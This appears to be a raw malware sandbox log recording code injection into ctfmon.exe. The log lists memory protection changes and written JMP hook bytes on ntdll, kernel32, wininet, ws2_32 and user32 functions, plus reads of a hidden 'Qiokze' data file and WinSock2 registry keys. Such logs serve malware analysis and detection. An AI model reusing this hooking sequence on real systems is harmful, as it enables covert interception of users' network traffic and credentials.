1828 C:\WINDOWS\system32\ctfmon.exe BC0050 10 8B FF 55 8B EC E9 F6 64 D8 3C success or wait 1 A4A569
1828 C:\WINDOWS\system32\ctfmon.exe 3D94654B 5 E9 2D DD 0F C3 success or wait 1 A4A591
1828 C:\WINDOWS\system32\ctfmon.exe BC005A 10 8B FF 55 8B EC E9 22 33 DA 3C success or wait 1 A4A569
1828 C:\WINDOWS\system32\ctfmon.exe 3D963381 5 E9 36 0F 0E C3 success or wait 1 A4A591
1828 C:\WINDOWS\system32\ctfmon.exe BC0064 10 8B FF 55 8B EC E9 1A BF D8 3C success or wait 1 A4A569
1828 C:\WINDOWS\system32\ctfmon.exe 3D94BF83 5 E9 7E 83 0F C3 success or wait 1 A4A591
1828 C:\WINDOWS\system32\ctfmon.exe BC006E 10 8B FF 55 8B EC E9 1A 87 D8 3C success or wait 1 A4A569
1828 C:\WINDOWS\system32\ctfmon.exe 3D94878D 5 E9 A0 BB 0F C3 success or wait 1 A4A591
1828 C:\WINDOWS\system32\ctfmon.exe BC0078 10 8B FF 55 8B EC E9 AE 3D EF 70 success or wait 1 A4A569
+ Memory allocated
PID Filepath Base Length Protection Completion Count Source Address
1828 C:\WINDOWS\system32\ctfmon.exe F30000 E2F6A8 page read and write success or wait 1 A44961
1828 C:\WINDOWS\system32\ctfmon.exe F30000 E2F6AC page read and write success or wait 1 A44961
1828 C:\WINDOWS\system32\ctfmon.exe BC0000 E2F47C page execute and read and write success or wait 1 A41A36
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
1828 C:\WINDOWS\system32\ctfmon.exe 7C90D1AE 1000 page execute and read and write page execute read success or wait 1 A4A4CC
1828 C:\WINDOWS\system32\ctfmon.exe BC0000 1000 page execute and read and write page execute and read and write success or wait 1 A4A569
1828 C:\WINDOWS\system32\ctfmon.exe BC0000 1000 page execute and read and write page execute and read and write success or wait 52 A4A569
1828 C:\WINDOWS\system32\ctfmon.exe 7C90D1AE 1000 page execute and read and write page execute and write copy success or wait 1 A4A591
1828 C:\WINDOWS\system32\ctfmon.exe 7C90D000 1000 page execute and write copy page execute and write copy success or wait 1 A4A591
1828 C:\WINDOWS\system32\ctfmon.exe 7C90D1AE 1000 page execute read page execute and read and write success or wait 1 A4A5AD
1828 C:\WINDOWS\system32\ctfmon.exe 7C91632D 1000 page execute and read and write page execute read success or wait 1 A4A4CC
1828 C:\WINDOWS\system32\ctfmon.exe BC000A 1000 page execute and read and write page execute and read and write success or wait 1 A4A569
1828 C:\WINDOWS\system32\ctfmon.exe 7C91632D 1000 page execute and read and write page execute and write copy success or wait 1 A4A591
1828 C:\WINDOWS\system32\ctfmon.exe 7C916000 1000 page execute and write copy page execute and write copy success or wait 1 A4A591
1828 C:\WINDOWS\system32\ctfmon.exe 7C91632D 1000 page execute read page execute and read and write success or wait 1 A4A5AD
1828 C:\WINDOWS\system32\ctfmon.exe 7C811195 1000 page execute and read and write page execute read success or wait 1 A4A4CC
1828 C:\WINDOWS\system32\ctfmon.exe BC0014 1000 page execute and read and write page execute and read and write success or wait 1 A4A569
1828 C:\WINDOWS\system32\ctfmon.exe 7C811195 1000 page execute and read and write page execute and write copy success or wait 1 A4A591
1828 C:\WINDOWS\system32\ctfmon.exe 7C811000 1000 page execute and write copy page execute and write copy success or wait 1 A4A591
1828 C:\WINDOWS\system32\ctfmon.exe 7C811195 1000 page execute read page execute and read and write success or wait 1 A4A5AD
1828 C:\WINDOWS\system32\ctfmon.exe 3D94FABE 1000 page execute and read and write page execute read success or wait 1 A4A4CC
1828 C:\WINDOWS\system32\ctfmon.exe BC001E 1000 page execute and read and write page execute and read and write success or wait 1 A4A569
1828 C:\WINDOWS\system32\ctfmon.exe 3D94FABE 1000 page execute and read and write page execute and write copy success or wait 1 A4A591
1828 C:\WINDOWS\system32\ctfmon.exe 3D94F000 1000 page execute and write copy page execute and write copy success or wait 1 A4A591
1828 C:\WINDOWS\system32\ctfmon.exe 3D94FABE 1000 page execute read page execute and read and write success or wait 1 A4A5AD
1828 C:\WINDOWS\system32\ctfmon.exe 3D95EE89 1000 page execute and read and write page execute read success or wait 1 A4A4CC
1828 C:\WINDOWS\system32\ctfmon.exe BC0028 1000 page execute and read and write page execute and read and write success or wait 1 A4A569
System Activities:
+ System information queried
System info class Completion Count Source Address
ProcessInformation success or wait 2 A472E5
+ Chronological sections
Operation Data Completion Time
Section loaded Path: \KnownDlls\WS2_32.dll Access: write and read and execute Type: unknown Baseaddress: 2890000 Size: 389120 Protection: readonly Mapped to pid: own pid object name not found 1999281293
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 1999282619
Section loaded Path: \KnownDlls\WS2HELP.dll Access: write and read and execute Type: unknown Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid object name not found 1999286990
Section loaded Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 1999288360
Section loaded Path: \KnownDlls\CRYPT32.dll Access: write and read and execute Type: unknown Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid object name not found 1999293057
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and write and read and execute Type: image Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid success or wait 1999294328
Section loaded Path: \KnownDlls\MSASN1.dll Access: write and read and execute Type: unknown Baseaddress: 77A80000 Size: 610304 Protection: read write Mapped to pid: own pid object name not found 1999296902
Section loaded Path: C:\WINDOWS\system32\msasn1.dll Access: query and write and read and execute Type: image Baseaddress: 77B20000 Size: 73728 Protection: read write Mapped to pid: own pid success or wait 1999298204
Section loaded Path: \KnownDlls\WININET.dll Access: write and read and execute Type: unknown Baseaddress: 3D930000 Size: 942080 Protection: read write Mapped to pid: own pid success or wait 1999306526
Section loaded Path: \KnownDlls\Normaliz.dll Access: write and read and execute Type: unknown Baseaddress: B90000 Size: 36864 Protection: read write Mapped to pid: own pid conflicting addresses 1999311833
Section loaded Path: \KnownDlls\urlmon.dll Access: write and read and execute Type: unknown Baseaddress: 78130000 Size: 1257472 Protection: read write Mapped to pid: own pid success or wait 1999317727
Section loaded Path: \KnownDlls\iertutil.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid success or wait 1999325502
Section loaded Path: \KnownDlls\NETAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 3DFD0000 Size: 2002944 Protection: read write Mapped to pid: own pid object name not found 1999435451
Section loaded Path: C:\WINDOWS\system32\netapi32.dll Access: query and write and read and execute Type: image Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid success or wait 1999437460
Memory allocated PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: F30000 Length: E2F6A8 Allocation Type: null Protection: page read and write success or wait 1999454976
Memory allocated PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: F30000 Length: E2F6AC Allocation Type: null Protection: page read and write success or wait 1999455252
File opened Path: C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.dat Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 1999534019
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: Enabled object name not found 1999534725
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: EnabledV8 success or wait 1999535301
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: CleanCookies success or wait 1999535861
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: CleanCookies success or wait 1999536426
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 1999537001
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 1999537579
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 1999538167
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 1999538832
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 1999539418
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 1999539993
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 1999540578
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 1999541149
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 1999541728
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 1999542305
Memory allocated PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: E2F47C Allocation Type: null Protection: page execute and read and write success or wait 1999543179
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C90D1AE Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 1999543959
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C90D1AE Length: 30 Value: B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 1999544254
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999544561
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999544841
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 10 Value: B8 35 00 00 00 E9 A9 D1 D4 7B success or wait 1999545169
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C90D1AE Length: 1000 New Protection: page execute and read and write New Protection: page execute and write copy success or wait 1999545469
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C90D000 Length: 1000 New Protection: page execute and write copy New Protection: page execute and write copy success or wait 1999545762
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C90D1AE Length: 5 Value: E9 33 B7 12 84 success or wait 1999546089
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C90D1AE Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 1999546401
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C91632D Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 1999547168
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C91632D Length: 30 Value: 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 1999547457
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC000A Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999547759
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999548051
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC000A Length: 10 Value: 68 6C 02 00 00 E9 1E 63 D5 7B success or wait 1999548381
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C91632D Length: 1000 New Protection: page execute and read and write New Protection: page execute and write copy success or wait 1999548647
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C916000 Length: 1000 New Protection: page execute and write copy New Protection: page execute and write copy success or wait 1999548938
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C91632D Length: 5 Value: E9 94 27 12 84 success or wait 1999549262
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C91632D Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 1999549573
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C811195 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 1999550275
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C811195 Length: 30 Value: 8B FF 55 8B EC 83 EC 64 83 7D 0C 01 56 57 0F 8D 13 AE 01 00 33 F6 39 75 0C 0F 8C 08 AE 01 success or wait 1999550564
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0014 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999550869
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999551160
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0014 Length: 10 Value: 8B FF 55 8B EC E9 7C 11 C5 7B success or wait 1999551492
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C811195 Length: 1000 New Protection: page execute and read and write New Protection: page execute and write copy success or wait 1999551757
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C811000 Length: 1000 New Protection: page execute and write copy New Protection: page execute and write copy success or wait 1999552047
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C811195 Length: 5 Value: E9 CE 79 22 84 success or wait 1999552371
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7C811195 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 1999552680
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D94FABE Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 1999554302
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D94FABE Length: 30 Value: 8B FF 55 8B EC 51 51 53 56 33 DB 57 33 F6 33 FF 39 5D 08 89 5D FC 89 5D F8 0F 84 2A EB 03 success or wait 1999554587
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC001E Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999554945
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999555235
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC001E Length: 10 Value: 8B FF 55 8B EC E9 9B FA D8 3C success or wait 1999555567
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D94FABE Length: 1000 New Protection: page execute and read and write New Protection: page execute and write copy success or wait 1999555831
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D94F000 Length: 1000 New Protection: page execute and write copy New Protection: page execute and write copy success or wait 1999556225
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D94FABE Length: 5 Value: E9 97 45 0F C3 success or wait 1999556554
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D94FABE Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 1999556866
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D95EE89 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 1999558254
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D95EE89 Length: 30 Value: 8B FF 55 8B EC 6A 10 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 19 FD FE FF 5D success or wait 1999558543
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0028 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999558899
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999559191
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0028 Length: 10 Value: 8B FF 55 8B EC E9 5C EE D9 3C success or wait 1999559524
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D95EE89 Length: 5 Value: E9 20 52 0E C3 success or wait 1999560411
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D9BA6BF Length: 30 Value: 8B FF 55 8B EC 51 51 53 33 C0 21 45 FC 21 45 F8 56 57 33 FF 33 DB 33 C9 33 D2 39 45 08 75 success or wait 1999561648
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999562292
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0032 Length: 10 Value: 8B FF 55 8B EC E9 88 A6 DF 3C success or wait 1999562626
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D9BA6BF Length: 5 Value: E9 3E 9A 08 C3 success or wait 1999563513
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D9BA666 Length: 30 Value: 8B FF 55 8B EC 53 56 57 33 DB 33 C9 33 D2 33 F6 33 FF 39 5D 10 75 2C 8B 45 0C 85 C0 74 14 success or wait 1999564740
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999565333
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC003C Length: 10 Value: 8B FF 55 8B EC E9 25 A6 DF 3C success or wait 1999565666
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D9BA666 Length: 5 Value: E9 33 9B 08 C3 success or wait 1999566549
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D949088 Length: 30 Value: 8B FF 55 8B EC 51 51 53 56 57 33 DB 33 FF F6 05 78 11 9E 3D 01 89 5D FC 0F 84 D9 6A 01 00 success or wait 1999568148
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999568804
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0046 Length: 10 Value: 8B FF 55 8B EC E9 3D 90 D8 3C success or wait 1999569141
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D949088 Length: 5 Value: E9 AD B1 0F C3 success or wait 1999570028
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D94654B Length: 30 Value: 8B FF 55 8B EC 83 EC 24 53 56 57 33 FF 39 3D B8 11 9E 3D 89 7D F4 89 7D F8 89 7D F0 C7 45 success or wait 1999572287
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999572935
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0050 Length: 10 Value: 8B FF 55 8B EC E9 F6 64 D8 3C success or wait 1999573268
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D94654B Length: 5 Value: E9 2D DD 0F C3 success or wait 1999574153
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D963381 Length: 30 Value: 8B FF 55 8B EC 83 EC 20 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D FC 89 5D F4 89 5D F8 C7 45 success or wait 1999576160
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999576804
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC005A Length: 10 Value: 8B FF 55 8B EC E9 22 33 DA 3C success or wait 1999577136
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D963381 Length: 5 Value: E9 36 0F 0E C3 success or wait 1999578019
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D94BF83 Length: 30 Value: 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D FC C7 45 F8 01 00 00 00 0F success or wait 1999580220
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999580866
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0064 Length: 10 Value: 8B FF 55 8B EC E9 1A BF D8 3C success or wait 1999581198
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D94BF83 Length: 5 Value: E9 7E 83 0F C3 success or wait 1999582085
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D94878D Length: 30 Value: 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D F8 89 5D FC 0F 84 C3 65 04 success or wait 1999584300
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999584945
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC006E Length: 10 Value: 8B FF 55 8B EC E9 1A 87 D8 3C success or wait 1999585277
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 3D94878D Length: 5 Value: E9 A0 BB 0F C3 success or wait 1999586164
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 71AB3E2B Length: 30 Value: 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 1999587192
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999587841
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0078 Length: 10 Value: 8B FF 55 8B EC E9 AE 3D EF 70 success or wait 1999588171
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 71AB4C27 Length: 30 Value: 8B FF 55 8B EC 83 EC 10 56 57 33 FF 81 3D 50 40 AC 71 29 2C AB 71 0F 84 25 6A 00 00 8D 45 success or wait 1999590068
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999590809
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 71AB68FA Length: 30 Value: 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 CD 4D 00 00 8D 45 F8 50 E8 98 success or wait 1999593038
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999593637
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E41ECA3 Length: 30 Value: B8 D7 11 00 00 BA 00 03 FE 7F FF 12 C2 0C 00 90 90 90 90 90 6A 2F 6A 01 E8 EE 97 FF FF 6A success or wait 1999596181
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999596776
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E41FE6E Length: 30 Value: B8 2E 12 00 00 BA 00 03 FE 7F FF 12 C2 04 00 33 FF 47 83 7D E4 FF 0F 85 AC AC FF FF C7 45 success or wait 1999599228
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999599823
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E428D20 Length: 30 Value: 6A 14 68 90 8D 42 7E E8 94 F8 FE FF E8 0B F9 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1999602261
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999602855
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E42C17E Length: 30 Value: 6A 14 68 F0 C1 42 7E E8 36 C4 FE FF E8 AD C4 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 1999605297
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999605890
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E423D3A Length: 30 Value: 8B FF 55 8B EC 8B 4D 08 E8 99 47 FF FF 85 C0 74 11 6A 00 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1999608340
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999608935
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E43E577 Length: 30 Value: 8B FF 55 8B EC 8B 4D 08 E8 5C 9F FD FF 85 C0 74 11 6A 01 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 1999611327
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999611922
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E430833 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 14 success or wait 1999614360
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999614952
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E44F965 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 D7 0E FE FF 5D C2 14 success or wait 1999617143
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999617738
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E430A47 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 10 00 90 90 success or wait 1999620172
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999620764
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E44F9B4 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 9C 10 FE FF 5D C2 10 00 90 90 success or wait 1999622906
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999623979
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E42A01E Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 89 FF FF FF 5D C2 14 success or wait 1999626474
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999627075
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E42A97D Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 2A F6 FF FF 5D C2 14 success or wait 1999629446
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: BC0000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999630042
Memory read PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: 7E41A39A Length: 30 Value: 8B FF 55 8B EC 83 EC 30 8B 45 08 56 57 6A 09 59 8D 70 04 8B 00 8D 7D D8 F3 A5 89 45 D4 33 success or wait 1999632456
